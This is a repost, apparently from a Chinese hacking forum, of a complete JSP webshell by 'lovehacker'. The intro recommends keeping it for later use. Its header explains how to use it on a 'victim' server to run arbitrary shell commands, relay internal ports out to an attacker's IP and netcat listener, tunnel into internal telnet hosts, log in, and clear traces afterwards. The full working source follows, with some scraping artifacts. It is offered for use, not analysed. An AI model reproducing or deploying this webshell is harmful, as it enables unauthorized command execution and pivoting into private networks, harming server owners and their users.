这东西在国内可不多.现在也许用不上,但是总有一天会用上的.LOVEHACKER写的
1
2/*
3* WEBSHELL.JSP
4*
5* Author: lovehacker
6* E-mail: [email protected]
7*
8* 使用方法:
9* ]http://victim/webshell.jsp?[options]
10* options:
11* action=piped&remoteHost=&remotePort=&myIp=&myPort=
12* action=tunnel&remoteHost=&remotePort=&myPort=
13* action=login&username=&password=&myPort=
14* action=send&myShell=&myPort=&cmd=
15* action=close&myPort=
16* action=shell&cmd=
17* 例子:
18* action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345 -- 将192.168.0.1的25端口与218.0.0.1的12345端口连接起来(可以先用NC监听12345端口)。适用于你无法直接访问已控制的WEB服务器的内网里某机器的某端口,而防火墙又未过滤该WEB服务器向外的连接。
19* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- 实现通过访问该webshell.jsp访问内网某主机telnet服务的功能。(原本想实现通过访问webshell.jsp实现对内网任意服务访问的功能,但jsp功能有限实现起来较为复杂),适用于你控制的机器只开了80端口,并且防火墙不允许它访问Internet,而你又非常想访问它内网某主机的Telnet服务:-)
20* action=login&username=root&password=helloroot&myPort=65534 -- 上一步只是告诉了要Telnet那台机器,这一步才开始真正登陆,你要输入要telnet主机的正确的用户名密码才行喔,要不然谁也没办法。
21* action=send&myShell=&myPort=&cmd= -- 上一步如果顺利完成,那么你就可以在上边执行你想执行的命令了。myShell这个参数是结束标记,否则无法知道数据流什么时间该结束(一定要写对喔,否则嘿嘿,就麻烦罗)。cmd这个参数就是你要执行的命令了,比如:“which ssh”,建议你这样玩:myShell=lovehacker&cmd=ls -la;echo lovehacker。
22* action=close&myPort= -- 你是退出了telnet登陆,但程序在主机上开放的端口还没关闭,所以你要再执行这个命令,现场打扫干净嘛。
23* action=shell&cmd= -- 在你控制的这台机器上执行命令。Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini
24* 程序说明:
25* 想通过jsp实现telnet代理的时候着实头痛了一把,每个请求都是一个新的线程,client socket去连接
26* telnet服务只能批量命令,无法实现与用户的交互,后来想了个笨办法:把telnet的过程分步完成,接
27* 收到tunnel命令后,先起两个线程,一个监听端口等待连接,一个先和远程服务器建立好端口连接并一
28* 直不断开,这下server socket再一次一次的收数据,一次次的转发到远程服务器,就可以记录状态,实
29* 现和用户的交互了,但总觉得这办法太笨,如果用JSP实现telnet代理功能,你有更好的办法的话请一定
30* 要来信告诉我。
31* 版权说明:
32* 本身实现Telnet的功能我也是在人家代码的基础上修改的,所以:版权没有,你可以任意修改、复制。
33* 只是加了新功能别忘了Mail一份给我喔!
34*
35*
36*/
1@ page import="java.io.*"
1@ page import="java.net.*"
1@ page import="java.util.*"
1@ page import="java.awt.Dimension"
1
2class redirector implements Runnable
3{
4private redirector companion = null;
5private Socket localSocket, remoteSocket;
6private InputStream from;
7private OutputStream to;
8private byte[] buffer = new byte[4096];
9
10public redirector(Socket local, Socket remote)
11{
12try {
13localSocket = local;
14remoteSocket = remote;
15from = localSocket.getInputStream();
16to = remoteSocket.getOutputStream();
17} catch(Exception e) {}
18}
19
20public void couple(redirector c) {
21companion = c;
22Thread listen = new Thread(this);
23listen.start();
24}
25
26public void decouple() { companion = null; }
27
28public void run()
29{
30int count;
31try {
32while(companion != null) {
33if((count = from.read(buffer)) < 0)
34break;
35to.write(buffer, 0, count);
36}
37} catch(Exception e) {}
38try {
39from.close();
40to.close();
41localSocket.close();
42remoteSocket.close();
43if(companion != null) companion.decouple();
44} catch(Exception io) {}
45}
46}
47
48class redirector1 implements Runnable
49{
50private redirector1 companion = null;
51private Socket localSocket, remoteSocket;
52private InputStream from;
53private OutputStream to;
54private byte[] buffer = new byte[4096];
55
56public redirector1(Socket local, Socket remote)
57{
58try {
59localSocket = local;
60remoteSocket = remote;
61from = localSocket.getInputStream();
62to = remoteSocket.getOutputStream();
63} catch(Exception e) {}
64}
65
66public void couple(redirector1 c) {
67companion = c;
68Thread listen = new Thread(this);
69listen.start();
70}
71
72public void decouple() { companion = null; }
73
74public void run()
75{
76String tmp = "";
77int count;
78try {
79while(companion != null) {
80if((count = from.read(buffer)) < 0) break;
81tmp = new String(buffer);
82if(tmp.startsWith("--GoodBye--"))
83{
84from.close();
85to.close();
86remoteSocket.close();
87localSocket.close();
88System.exit(1);
89}
90to.write(buffer, 0, count);
91}
92} catch(Exception e) {}
93try {
94if(companion != null) companion.decouple();
95} catch(Exception io) {}
96}
97}
98
99class piped implements Runnable
100{
101String remoteHost1,remoteHost2;
102int remotePort1, remotePort2;
103
104Thread listener, connection;
105
106
107public piped(String raddr1,int rport1, String raddr2, int rport2)
108{
109remoteHost1 = raddr1; remotePort1 = rport1;
110remoteHost2 = raddr2; remotePort2 = rport2;
111listener = new Thread(this);
112listener.setPriority(Thread.MIN_PRIORITY);
113listener.start();
114}
115
116public void run()
117{
118Socket destinationSocket1 = null;
119Socket destinationSocket2 = null;
120try {
121destinationSocket1 = new Socket(remoteHost1,remotePort1);
122destinationSocket2 = new Socket(remoteHost2, remotePort2);
123redirector r1 = new redirector(destinationSocket1, destinationSocket2);
124redirector r2 = new redirector(destinationSocket2, destinationSocket1);
125r1.couple(r2);
126r2.couple(r1);
127} catch(Exception e) {
128try {
129DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream());
130os.writeChars("Remote host refused connection.\n");
131destinationSocket2.close();
132} catch(IOException ioe) { }
133}
134}
135}
136
137class tunnel implements Runnable
138{
139String remoteHost;
140int localPort, remotePort;
141
142Thread listener, connection;
143
144ServerSocket server;
145
146public tunnel(int lport, String raddr, int rport)
147{
148localPort = lport;
149remoteHost = raddr; remotePort = rport;
150
151try {
152server = new ServerSocket(localPort);
153} catch(Exception e) {}
154
155listener = new Thread(this);
156listener.setPriority(Thread.MIN_PRIORITY);
157listener.start();
158}
159
160public void run()
161{
162Socket destinationSocket = null;
163try{
164destinationSocket = new Socket(remoteHost, remotePort);
165}catch(Exception e){}
166while(true)
167{
168Socket localSocket = null;
169try {
170localSocket = server.accept();
171} catch(Exception e) {
172continue;
173}
174try {
175redirector1 r1 = new redirector1(localSocket, destinationSocket);
176redirector1 r2 = new redirector1(destinationSocket, localSocket);
177r1.couple(r2);
178r2.couple(r1);
179} catch(Exception e) {
180try {
181DataOutputStream os = new DataOutputStream(localSocket.getOutputStream());
182os.writeChars("Remote host refused connection.\n");
183localSocket.close();
184} catch(IOException ioe) {}
185continue;
186}
187}
188}
189}
190
191class TelnetIO
192{
193public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; }
194
195private int debug = 0;
196
197private byte neg_state = 0;
198
199private final static byte STATE_DATA = 0;
200private final static byte STATE_IAC = 1;
201private final static byte STATE_IACSB = 2;
202private final static byte STATE_IACWILL = 3;
203private final static byte STATE_IACDO = 4;
204private final static byte STATE_IACWONT = 5;
205private final static byte STATE_IACDONT = 6;
206private final static byte STATE_IACSBIAC = 7;
207private final static byte STATE_IACSBDATA = 8;
208private final static byte STATE_IACSBDATAIAC = 9;
209
210private byte current_sb;
211
212private final static byte IAC = (byte)255;
213
214private final static byte EOR = (byte)239;
215
216private final static byte WILL = (byte)251;
217
218private final static byte WONT = (byte)252;
219
220private final static byte DO = (byte)253;
221
222private final static byte DONT = (byte)254;
223
224private final static byte SB = (byte)250;
225
226private final static byte SE = (byte)240;
227
228private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */
229
230private final static byte TELOPT_EOR = (byte)25; /* end of record */
231
232private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/
233
234private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */
235
236private final byte[] IACWILL = { IAC, WILL };
237private final byte[] IACWONT = { IAC, WONT };
238private final byte[] IACDO = { IAC, DO };
239private final byte[] IACDONT = { IAC, DONT };
240private final byte[] IACSB = { IAC, SB };
241private final byte[] IACSE = { IAC, SE };
242
243private final byte TELQUAL_IS = (byte)0;
244
245private final byte TELQUAL_SEND = (byte)1;
246
247private byte[] receivedDX;
248
249private byte[] receivedWX;
250
251private byte[] sentDX;
252
253private byte[] sentWX;
254
255private Socket socket;
256private BufferedInputStream is;
257private BufferedOutputStream os;
258
259//private StatusPeer peer = this; /* peer, notified on status */
260
261public void connect(String address, int port) throws IOException {
262if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")");
263socket = new Socket(address, port);
264is = new BufferedInputStream(socket.getInputStream());
265os = new BufferedOutputStream(socket.getOutputStream());
266neg_state = 0;
267receivedDX = new byte[256];
268sentDX = new byte[256];
269receivedWX = new byte[256];
270sentWX = new byte[256];
271}
272
273public void disconnect() throws IOException {
274if(debug > 0) System.out.println("TelnetIO.disconnect()");
275if(socket !=null) socket.close();
276}
277
278public void connect(String address) throws IOException {
279connect(address, 23);
280}
281
282//public void setPeer(StatusPeer obj) { peer = obj; }
283
284public int available() throws IOException
285{
286return is.available();
287}
288
289public byte[] receive() throws IOException {
290int count = is.available();
291byte buf[] = new byte[count];
292count = is.read(buf);
293if(count < 0) throw new IOException("Connection closed.");
294if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count);
295buf = negotiate(buf, count);
296return buf;
297}
298
299public void send(byte[] buf) throws IOException {
300if(debug > 1) System.out.println("TelnetIO.send("+buf+")");
301os.write(buf);
302os.flush();
303}
304
305public void send(byte b) throws IOException {
306if(debug > 1) System.out.println("TelnetIO.send("+b+")");
307os.write(b);
308os.flush();
309}
310
311private void handle_sb(byte type, byte[] sbdata, int sbcount)
312throws IOException
313{
314if(debug > 1)
315System.out.println("TelnetIO.handle_sb("+type+")");
316switch (type) {
317case TELOPT_TTYPE:
318if (sbcount>0 && sbdata[0]==TELQUAL_SEND) {
319String ttype;
320send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS);
321/* FIXME: need more logic here if we use
322* more than one terminal type
323*/
324Vector vec = new Vector(2);
325vec.addElement("TTYPE");
326ttype = (String)notifyStatus(vec);
327if(ttype == null) ttype = "dumb";
328byte[] bttype = new byte[ttype.length()];
329
330ttype.getBytes(0,ttype.length(), bttype, 0);
331send(bttype);
332send(IACSE);
333}
334
335}
336}
337
338public Object notifyStatus(Vector status) {
339if(debug > 0)
340System.out.println("TelnetIO.notifyStatus("+status+")");
341return null;
342}
343
344private byte[] negotiate(byte buf[], int count) throws IOException {
345if(debug > 1)
346System.out.println("TelnetIO.negotiate("+buf+","+count+")");
347byte nbuf[] = new byte[count];
348byte sbbuf[] = new byte[count];
349byte sendbuf[] = new byte[3];
350byte b,reply;
351int sbcount = 0;
352int boffset = 0, noffset = 0;
353Vector vec = new Vector(2);
354
355while(boffset < count) {
356b=buf[boffset++];
357
358if (b>=128)
359b=(byte)((int)b-256);
360switch (neg_state) {
361case STATE_DATA:
362if (b==IAC) {
363neg_state = STATE_IAC;
364} else {
365nbuf[noffset++]=b;
366}
367break;
368case STATE_IAC:
369switch (b) {
370case IAC:
371if(debug > 2)
372System.out.print("IAC ");
373neg_state = STATE_DATA;
374nbuf[noffset++]=IAC;
375break;
376case WILL:
377if(debug > 2)
378System.out.print("WILL ");
379neg_state = STATE_IACWILL;
380break;
381case WONT:
382if(debug > 2)
383System.out.print("WONT ");
384neg_state = STATE_IACWONT;
385break;
386case DONT:
387if(debug > 2)
388System.out.print("DONT ");
389neg_state = STATE_IACDONT;
390break;
391case DO:
392if(debug > 2)
393System.out.print("DO ");
394neg_state = STATE_IACDO;
395break;
396case EOR:
397if(debug > 2)
398System.out.print("EOR ");
399neg_state = STATE_DATA;
400break;
401case SB:
402if(debug > 2)
403System.out.print("SB ");
404neg_state = STATE_IACSB;
405sbcount = 0;
406break;
407default:
408if(debug > 2)
409System.out.print(
410"
<unknown "+b+"=""> "
);
neg_state = STATE_DATA;
break;
}
break;
case STATE_IACWILL:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = DO;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DO;
break;
default:
if(debug > 2)
System.out.println(
"<unknown,"+b+">"
);
reply = DONT;
break;
}
if(debug > 1)
System.out.println("<"+b+", WILL ="+WILL+">");
if ( reply != sentDX[b+128] ||
WILL != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACWONT:
switch(b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
reply = DONT;
break;
case TELOPT_EOR:
if(debug > 2)
System.out.println("EOR");
reply = DONT;
break;
default:
if(debug > 2)
System.out.println(
"<unknown,"+b+">"
);
reply = DONT;
break;
}
if ( reply != sentDX[b+128] ||
WONT != receivedWX[b+128]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentDX[b+128] = reply;
receivedWX[b+128] = WILL;
}
neg_state = STATE_DATA;
break;
case STATE_IACDO:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WILL;
vec = new Vector(2);
vec.addElement("LOCALECHO");
notifyStatus(vec);
break;
case TELOPT_TTYPE:
if(debug > 2)
System.out.println("TTYPE");
reply = WILL;
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
vec = new Vector(2);
vec.addElement("NAWS");
Dimension size = (Dimension)
notifyStatus(vec);
receivedDX[b] = DO;
if(size == null)
{
/* this shouldn't happen */
send(IAC);
send(WONT);
send(TELOPT_NAWS);
reply = WONT;
sentWX[b] = WONT;
break;
}
reply = WILL;
sentWX[b] = WILL;
sendbuf[0]=IAC;
sendbuf[1]=WILL;
sendbuf[2]=TELOPT_NAWS;
send(sendbuf);
send(IAC);send(SB);send(TELOPT_NAWS);
send((byte) (size.width >> 8));
send((byte) (size.width & 0xff));
send((byte) (size.height >> 8));
send((byte) (size.height & 0xff));
send(IAC);send(SE);
break;
default:
if(debug > 2)
System.out.println(
"<unknown,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[128+b] ||
DO != receivedDX[128+b]
) {
sendbuf[0]=IAC;
sendbuf[1]=reply;
sendbuf[2]=b;
send(sendbuf);
sentWX[b+128] = reply;
receivedDX[b+128] = DO;
}
neg_state = STATE_DATA;
break;
case STATE_IACDONT:
switch (b) {
case TELOPT_ECHO:
if(debug > 2)
System.out.println("ECHO");
reply = WONT;
vec = new Vector(2);
vec.addElement("NOLOCALECHO");
notifyStatus(vec);
break;
case TELOPT_NAWS:
if(debug > 2)
System.out.println("NAWS");
reply = WONT;
break;
default:
if(debug > 2)
System.out.println(
"<unknown,"+b+">"
);
reply = WONT;
break;
}
if ( reply != sentWX[b+128] ||
DONT != receivedDX[b+128]
) {
send(IAC);send(reply);send(b);
sentWX[b+128] = reply;
receivedDX[b+128] = DONT;
}
neg_state = STATE_DATA;
break;
case STATE_IACSBIAC:
if(debug > 2) System.out.println(""+b+" ");
if (b == IAC) {
sbcount = 0;
current_sb = b;
neg_state = STATE_IACSBDATA;
} else {
System.out.println("(bad) "+b+" ");
neg_state = STATE_DATA;
}
break;
case STATE_IACSB:
if(debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBIAC;
break;
default:
current_sb = b;
sbcount = 0;
neg_state = STATE_IACSBDATA;
break;
}
break;
case STATE_IACSBDATA:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATAIAC;
break;
default:
sbbuf[sbcount++] = b;
break;
}
break;
case STATE_IACSBDATAIAC:
if (debug > 2) System.out.println(""+b+" ");
switch (b) {
case IAC:
neg_state = STATE_IACSBDATA;
sbbuf[sbcount++] = IAC;
break;
case SE:
handle_sb(current_sb,sbbuf,sbcount);
current_sb = 0;
neg_state = STATE_DATA;
break;
case SB:
handle_sb(current_sb,sbbuf,sbcount);
neg_state = STATE_IACSB;
break;
default:
neg_state = STATE_DATA;
break;
}
break;
default:
if (debug > 2)
System.out.println(
"This should not happen: "+
neg_state+" "
);
neg_state = STATE_DATA;
break;
}
}
buf = new byte[noffset];
System.arraycopy(nbuf, 0, buf, 0, noffset);
return buf;
}
}
class TelnetConnect
{
TelnetIO tio = new TelnetIO();
int port = 0;
public TelnetConnect(int port)
{
this.port = port;
}
public void connect()
{
try {
tio.connect("localhost",port);
} catch(IOException e) {}
}
public void disconnect()
{
try{
tio.disconnect();
}catch(IOException e){}
}
private String wait(String prompt)
{
String tmp = "";
do {
try {
tmp += new String(tio.receive(), 0);
}catch(IOException e) {}
} while(tmp.indexOf(prompt) == -1);
return tmp;
}
private byte[] receive()
{
byte[] temp = null;
try{
temp = tio.receive();
}catch(IOException e){}
return temp;
}
private String waitshell()
{
String tmp = "";
do {
try { tmp += new String(tio.receive(), 0); }
catch(IOException e) {}
} while((tmp.indexOf("$") == -1)&&(tmp.indexOf("#") == -1)&&(tmp.indexOf("%") == -1));
return tmp;
}
private void send(String str)
{
byte[] buf = new byte[str.length()];
str.getBytes(0, str.length(), buf, 0);
try { tio.send(buf); } catch(IOException e) {}
}
}
String action = request.getParameter("action");
String cmd = request.getParameter("cmd");
String remoteHost = request.getParameter("remoteHost");
String myIp = request.getParameter("myIp");
String myPort = request.getParameter("myPort");
String remotePort = request.getParameter("remotePort");
String username = request.getParameter("username");
String password = request.getParameter("password");
String myShell = request.getParameter("myShell");
if(action.equals("shell")){
try {
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) { out.print((char)c); }
in.close();
try { child.waitFor();} catch (InterruptedException e) {}
} catch (IOException e) {}
}else if(action.equals("piped")){
piped me = new piped(remoteHost,Integer.parseInt(remotePort),myIp,Integer.parseInt(myPort));
}else if(action.equals("tunnel")){
tunnel me = new tunnel(Integer.parseInt(myPort),
remoteHost, Integer.parseInt(remotePort));
}else if(action.equals("login")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
out.print(tc.wait("login:"));
tc.send(username+"\r");
out.print(tc.wait("Password:"));
tc.send(password+"\r");
out.print(tc.waitshell());
tc.disconnect();
}else if(action.equals("send")){
TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort));
tc.connect();
tc.send(cmd+"\r");
if(!myShell.equals("logout"))
out.print(tc.wait(myShell));
tc.disconnect();
}else if(action.equals("close")){
try{
Socket s = new Socket("127.0.0.1",Integer.parseInt(myPort));
DataOutputStream dos = new DataOutputStream(s.getOutputStream());
PrintStream ps = new PrintStream(dos);
ps.println("--GoodBye--");
ps.close();
dos.close();
s.close();
}catch(Exception e){}
}else{
out.print("<font color="black" size="7">You Love Hacker Too?");
}